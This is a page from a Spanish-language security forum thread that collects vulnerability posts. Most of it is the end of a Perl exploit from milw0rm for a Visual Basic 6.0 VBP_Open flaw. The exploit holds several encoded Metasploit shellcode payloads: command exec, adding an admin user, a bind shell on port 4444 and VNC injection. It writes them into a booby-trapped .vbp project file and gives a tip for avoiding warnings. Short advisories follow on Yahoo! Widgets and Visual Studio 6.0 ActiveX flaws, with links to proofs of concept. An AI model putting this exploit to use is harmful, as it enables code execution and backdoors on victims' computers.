  212.   "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x35\x4f\x4f\x48\x4d\x45\x45".
  213.   "\x4f\x4f\x42\x4d\x48\x56\x4c\x36\x46\x56\x48\x46\x4a\x36\x43\x46".
  214.   "\x4d\x36\x49\x38\x45\x4e\x4c\x46\x42\x35\x49\x45\x49\x32\x4e\x4c".
  215.   "\x49\x48\x47\x4e\x4c\x56\x46\x54\x49\x48\x44\x4e\x41\x43\x42\x4c".
  216.   "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x54\x4e\x42".
  217.   "\x43\x59\x4d\x38\x4c\x47\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36".
  218.   "\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x47\x46\x54\x4f\x4f".
  219.   "\x48\x4d\x4b\x45\x47\x45\x44\x35\x41\x35\x41\x45\x41\x55\x4c\x46".
  220.   "\x41\x30\x41\x45\x41\x45\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x36".
  221.   "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x56".
  222.   "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x48\x47\x35\x4e\x4f".
  223.   "\x43\x38\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d".
  224.   "\x4a\x56\x42\x4f\x4c\x58\x46\x50\x4f\x55\x43\x45\x4f\x4f\x48\x4d".
  225.   "\x4f\x4f\x42\x4d\x5a";
  226.  
  227. # win32_bind_vncinject -  VNCDLL=/home/opcode/msfweb/framework/data/vncdll.dll EXITFUNC=seh AUTOVNC=1 VNCPORT=5900 LPORT=4444 Size=649 Encoder=PexAlphaNum http://metasploit.com
  228. $shellc4 = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
  229.   "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
  230.   "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
  231.   "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
  232.   "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4a\x4e\x48\x55\x42\x50".
  233.   "\x42\x30\x42\x30\x43\x55\x45\x35\x48\x45\x47\x45\x4b\x38\x4e\x36".
  234.   "\x46\x42\x4a\x31\x4b\x38\x45\x54\x4e\x33\x4b\x48\x46\x55\x45\x30".
  235.   "\x4a\x47\x41\x50\x4c\x4e\x4b\x58\x4c\x54\x4a\x31\x4b\x48\x4c\x55".
  236.   "\x42\x42\x41\x50\x4b\x4e\x43\x4e\x44\x43\x49\x54\x4b\x58\x46\x33".
  237.   "\x4b\x48\x41\x30\x50\x4e\x41\x33\x4f\x4f\x4e\x4f\x41\x43\x42\x4c".
  238.   "\x4e\x4a\x4a\x53\x42\x4e\x46\x57\x47\x30\x41\x4c\x4f\x4c\x4d\x30".
  239.   "\x41\x30\x47\x4c\x4b\x4e\x44\x4f\x4b\x33\x4e\x47\x46\x42\x46\x51".
  240.   "\x45\x37\x41\x4e\x4b\x38\x4c\x35\x46\x52\x41\x30\x4b\x4e\x48\x56".
  241.   "\x4b\x58\x4e\x50\x4b\x54\x4b\x48\x4c\x55\x4e\x51\x41\x30\x4b\x4e".
  242.   "\x4b\x58\x46\x30\x4b\x58\x41\x50\x4a\x4e\x4b\x4e\x44\x50\x41\x43".
  243.   "\x42\x4c\x4f\x35\x50\x35\x4d\x35\x4b\x45\x44\x4c\x4a\x50\x42\x50".
  244.   "\x50\x55\x4c\x36\x42\x33\x49\x55\x46\x46\x4b\x58\x49\x31\x4b\x38".
  245.   "\x4b\x45\x4e\x50\x4b\x38\x4b\x35\x4e\x31\x4b\x48\x4b\x51\x4b\x58".
  246.   "\x4b\x45\x4a\x30\x43\x55\x4a\x56\x50\x38\x50\x34\x50\x50\x4e\x4e".
  247.   "\x4f\x4f\x48\x4d\x49\x48\x47\x4c\x41\x58\x4e\x4e\x42\x50\x41\x50".
  248.   "\x42\x50\x42\x30\x47\x45\x48\x55\x43\x45\x49\x38\x45\x4e\x4a\x4e".
  249.   "\x47\x52\x42\x30\x42\x30\x42\x30\x42\x59\x41\x50\x42\x30\x42\x50".
  250.   "\x48\x4b\x49\x51\x4a\x51\x47\x4e\x46\x4a\x49\x31\x42\x47\x49\x4e".
  251.   "\x45\x4e\x49\x54\x48\x58\x49\x54\x46\x4a\x4c\x51\x42\x37\x47\x4c".
  252.   "\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x49\x4d\x49\x50\x45\x4f\x4d\x4a".
  253.   "\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x43\x47\x45\x43\x35\x44\x33\x4f\x45".
  254.   "\x43\x33\x44\x43\x42\x30\x4b\x45\x4d\x38\x4b\x34\x42\x42\x41\x55".
  255.   "\x4f\x4f\x47\x4d\x49\x58\x4f\x4d\x49\x38\x43\x4c\x4d\x58\x45\x47".
  256.   "\x46\x41\x4c\x36\x47\x30\x49\x45\x41\x35\x43\x45\x4f\x4f\x46\x43".
  257.   "\x4f\x38\x4f\x4f\x45\x35\x46\x50\x49\x35\x49\x58\x46\x50\x50\x48".
  258.   "\x44\x4e\x44\x4f\x4b\x32\x47\x52\x46\x35\x4f\x4f\x47\x43\x4f\x4f".
  259.   "\x45\x35\x42\x43\x41\x53\x42\x4c\x42\x45\x42\x35\x42\x35\x42\x55".
  260.   "\x42\x54\x42\x55\x42\x44\x42\x35\x4f\x4f\x45\x45\x4e\x32\x49\x48".
  261.   "\x47\x4c\x41\x53\x4b\x4d\x43\x45\x43\x45\x4a\x46\x44\x30\x42\x50".
  262.   "\x41\x31\x4e\x55\x49\x48\x42\x4e\x4c\x36\x42\x31\x42\x35\x47\x55".
  263.   "\x4f\x4f\x45\x35\x46\x32\x43\x55\x47\x45\x4f\x4f\x45\x45\x4a\x32".
  264.   "\x43\x55\x46\x35\x47\x45\x4f\x4f\x45\x55\x42\x32\x49\x48\x47\x4c".
  265.   "\x41\x58\x4e\x4e\x42\x50\x42\x31\x42\x50\x42\x50\x49\x58\x43\x4e".
  266.   "\x4c\x46\x42\x50\x4a\x46\x42\x30\x42\x51\x42\x30\x42\x30\x43\x35".
  267.   "\x47\x45\x4f\x4f\x45\x35\x4a\x31\x41\x58\x4e\x4e\x42\x30\x46\x30".
  268.   "\x42\x30\x42\x30\x4f\x4f\x43\x4d\x5a";
  269.  
  270. # win32_exec -  EXITFUNC=seh CMD=shutdown -c "HAI VEn0m pwn3d j00r b0x0r wif k0sh1 u b1tch" Size=451 Encoder=PexAlphaNum http://metasploit.com
  271. $shellc5 = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
  272.   "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
  273.   "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
  274.   "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
  275.   "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
  276.   "\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x54\x4e\x43\x4b\x38\x4e\x47".
  277.   "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x51\x4b\x48".
  278.   "\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x43\x4b\x48".
  279.   "\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
  280.   "\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e".
  281.   "\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x30\x45\x37\x45\x4e\x4b\x38".
  282.   "\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x34".
  283.   "\x4b\x38\x4f\x45\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x31\x4b\x48".
  284.   "\x41\x50\x4b\x4e\x49\x48\x4e\x35\x46\x32\x46\x50\x43\x4c\x41\x43".
  285.   "\x42\x4c\x46\x56\x4b\x48\x42\x34\x42\x43\x45\x58\x42\x4c\x4a\x37".
  286.   "\x4e\x50\x4b\x38\x42\x34\x4e\x50\x4b\x38\x42\x57\x4e\x51\x4d\x4a".
  287.   "\x4b\x58\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x58\x42\x58\x42\x4b".
  288.   "\x42\x50\x42\x30\x42\x50\x4b\x48\x4a\x46\x4e\x43\x4f\x45\x41\x53".
  289.   "\x48\x4f\x42\x36\x48\x35\x49\x48\x4a\x4f\x43\x58\x42\x4c\x4b\x37".
  290.   "\x42\x45\x4a\x56\x42\x4f\x4c\x48\x46\x30\x4f\x55\x4a\x56\x4a\x39".
  291.   "\x50\x4f\x4c\x58\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x37\x4a\x56".
  292.           "\x45\x47\x46\x37\x46\x46\x4f\x36\x47\x37\x50\x46\x42\x42\x4d\x42".
  293.   "\x43\x36\x42\x42\x44\x42\x4a\x34\x41\x54\x49\x34\x42\x42\x48\x35".
  294.   "\x45\x34\x50\x56\x42\x33\x4d\x56\x42\x52\x42\x57\x47\x57\x50\x56".
  295.   "\x43\x33\x46\x36\x42\x32\x4c\x46\x42\x33\x42\x33\x44\x37\x42\x32".
  296.   "\x44\x46\x42\x53\x4a\x57\x42\x33\x44\x47\x42\x52\x47\x47\x49\x56".
  297.   "\x48\x46\x42\x52\x4b\x56\x42\x33\x43\x57\x4a\x56\x41\x53\x42\x32".
  298.   "\x45\x37\x42\x32\x44\x56\x41\x43\x46\x37\x43\x46\x4a\x56\x44\x32".
  299.   "\x42\x30\x5a";
  300.  
  301. $endQuote = "\x22";
  302.  
  303. $i = $ARGV[0];
  304.  
  305.  
  306. if ($i==1){
  307. print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc1$endQuote$koshi";
  308. }
  309.  
  310.  
  311. if ($i==2){
  312. print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc2$endQuote$koshi";
  313. }
  314.  
  315.  
  316. if ($i==3){
  317. print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc3$endQuote$koshi";
  318. }
  319.  
  320.  
  321. if ($i==4){
  322. print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc4$endQuote$koshi";
  323. }
  324.  
  325.  
  326. if ($i==5){
  327. print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc5$endQuote$koshi";
  328. }
  329.  
  330.  
  331. print "\n";
  332. print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
  333. print " +++                                                        +++\n";
  334. print " +++                                                        +++\n";
  335. print " +++ Microsoft Visual Basic 6.0 VBP_Open OLE Local CodeExec +++\n";
  336. print " +++ Written By Koshi                                       +++\n";
  337. print " +++ Greets: Rima my baby! Draven, thanks for helping.      +++\n";
  338. print " +++                                                        +++\n";
  339. print " +++ Usage Ex.: ./vb6.pl 1 >>Project1.vbp                   +++\n";
  340. print " +++                                                        +++\n";
  341. print " +++  Options:                                              +++\n";
  342. print " +++          1 - win32_exec CALC.EXE                       +++\n";
  343. print " +++          2 - win32_adduser Pass=4dmin User=koshi       +++\n";
  344. print " +++          3 - win32_bind Port 4444                      +++\n";
  345. print " +++          4 - win32_bind_vncinject Port 5900            +++\n";
  346. print " +++          5 - win32_exec shutdown -c \x22HAI VEn0m pw..    +++\n";
  347. print " +++                                                        +++\n";
  348. print " +++                                                        +++\n";
  349. print " +++ Notes: Ship final .VBP file with a .FRM file to avoid  +++\n";
  350. print " +++        warnings in Visual Basic 6.0                    +++\n";
  351. print " +++                                                        +++\n";
  352. print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
  353.  
  354.  
  355.  
  356.  
  357.  
  358.  
  359.  
  360.  
  361. #EOF
  362.  
  363. # milw0rm.com [2007-09-04]

Fuente: milw0rm.com
En línea

YaTaMaS
Colaborador
***
Desconectado Desconectado

Mensajes: 4.670


Nada es seguro y todo es posible


Ver Perfil WWW
Ejecución de código con Yahoo! Widgets Engine
« Respuesta #68 en: 10 Septiembre 2007, 13:19 »

Descripción:

Una vulnerabilidad en Yahoo! Widgets Engine, puede permitir a un atacante remoto la ejecución arbitraria de código en el contexto de una aplicación que utilice controles ActiveX (típicamente Internet Explorer).

La explotación de esta vulnerabilidad, igualmente podría producir una denegación de servicio (la aplicación relacionada o el propio navegador, dejaría de responder).

Los widgets (o gadgets), son pequeñas aplicaciones o programas diseñados para proveer de información o mejorar una aplicación o servicios de una computadora, o bien cualquier tipo de interacción a través de Internet, por ejemplo información en tiempo real del clima, etc. Yahoo! utiliza para su ejecución su propio motor de Widgets (o Widget Engine).

El problema lo origina un error de límites en la comprobación de los datos proporcionados por las aplicaciones al motor, lo que puede provocar un desbordamiento de búfer en el control ActiveX YDPCTL.DLL utilizado por Yahoo! Widget Engine.

Es vulnerable la versión 4.0.3 (build 178) y posiblemente también las anteriores.

Se ha publicado en Internet una prueba de concepto del exploit.

Se sugiere a los usuarios de los Widgets de Yahoo! a instalar la versión más reciente del motor (4.0.5 o superior), desde el siguiente enlace:

Yahoo! Widgets
http://widgets.yahoo.com/

Relacionados:

Yahoo! Widgets Engine YDPCTL.DLL ActiveX Control Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/25086

Saturday, September 08, 2007 A new exploit this weekend (Roger Thompson)
http://explabs.blogspot.com/2007/09/new-exploit-this-weekend.html

Créditos:
Parvez Anwar

(c) Video Soft - http://www.videosoft.net.uy
(c) VSAntivirus - http://www.vsantivirus.com
En línea

Semitorre Tacens Sagitta Lux + Intel Q6600 2,4Ghz @ 3,2 + Zalman 8700 Led Quad Core + Placa Asus P5KC
+ 8GB DDR2 800 Kingston HiperX + GeForce GTX 960 + Disco SSD

yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Microsoft Visual Studio/Foxpro 6.0 [PoC]
« Respuesta #69 en: 12 Septiembre 2007, 01:20 »

Citar

   Microsoft Visual FoxPro 6.0: Consumición de recursos   
   
     [Descripción]

        La librería FILTER.DLL, utilizada por FoxPro, es propensa a una denegación del servicio, consumiendo todos
        los recursos del programa, al introducir como parámetro, al método DoSearch, un valor entero tipo long.

     [Versiones afectadas]
        - Microsoft Visual FoxPro 6.0 FILER.DLL v. 6.0.8015.0
      
     [Enlaces]
        - Prueba del concepto: http://shinnai.altervista.org/exploits/xIU47LaLP6KnW40Z2wPn.html

   
Citar

   Microsoft Visual Studio 6.0: Sobreescritura de archivos
   
     [Descripción]

        Utilizando la función Load y SaveAs, es posible sobreescribir archivos en la máquina afectada siempre y
        cuando el usuario tenga los suficientes privilegios para realizar dichas operaciones.

     [Versiones afectadas]
        - Microsoft Visual Basic 6.0 VBTOVSI.DLL v. 1.0.0.0
      
     [Enlaces]
        - Prueba del concepto: http://shinnai.altervista.org/exploits/qwFZc3a35RLy5AGxVBjJ.html


Citar

   Microsoft Visual Studio 6.0: Ejecución remota de comandos
   
     [Descripción]

        El control PDWizard.OCX, perteneciente a Visual Studio 6.0, contiene varios métodos que podrían ser utilizados
        para ejecutar, modificar o editar archivos procedentes de la máquina de la víctima. Los métodos a los que
        se hace referencia son los siguientes: StartProcess, SyncShell, SaveAs, CABDefaultURL, CABFileName, CABRunFile.

     [Versiones afectadas]
        - Microsoft Visual Studio 6.0 PDWizard.ocx v. <= 6.0.0.9782
      
     [Enlaces]
        - Prueba del concepto: http://shinnai.altervista.org/exploits/AZJ5bXwXvMARqwtfe97I.html


       Fuente original: http://shinnai.altervista.org

En línea

Páginas: 1 2 3 4 5 6 [7] 8 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Recopilatorio de Mensajes Interesantes [Actualizado 01/03/10]
Hacking Básico
Rojodos 1 202,108 Último mensaje 15 Septiembre 2010, 22:23
por kamsky
Recopilatorio de temas interesantes - Scripting -
Scripting
sirdarckcat 4 23,319 Último mensaje 21 Febrero 2009, 23:48
por Foxy Rider
[Recopilatorio] Sources interesantes « 1 2 »
Programación C/C++
Littlehorse 13 32,074 Último mensaje 1 Mayo 2012, 21:12
por linkingcrk
Recopilatorio de temas interesantes
.NET
[D4N93R] 0 9,304 Último mensaje 2 Agosto 2010, 19:24
por [D4N93R]
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines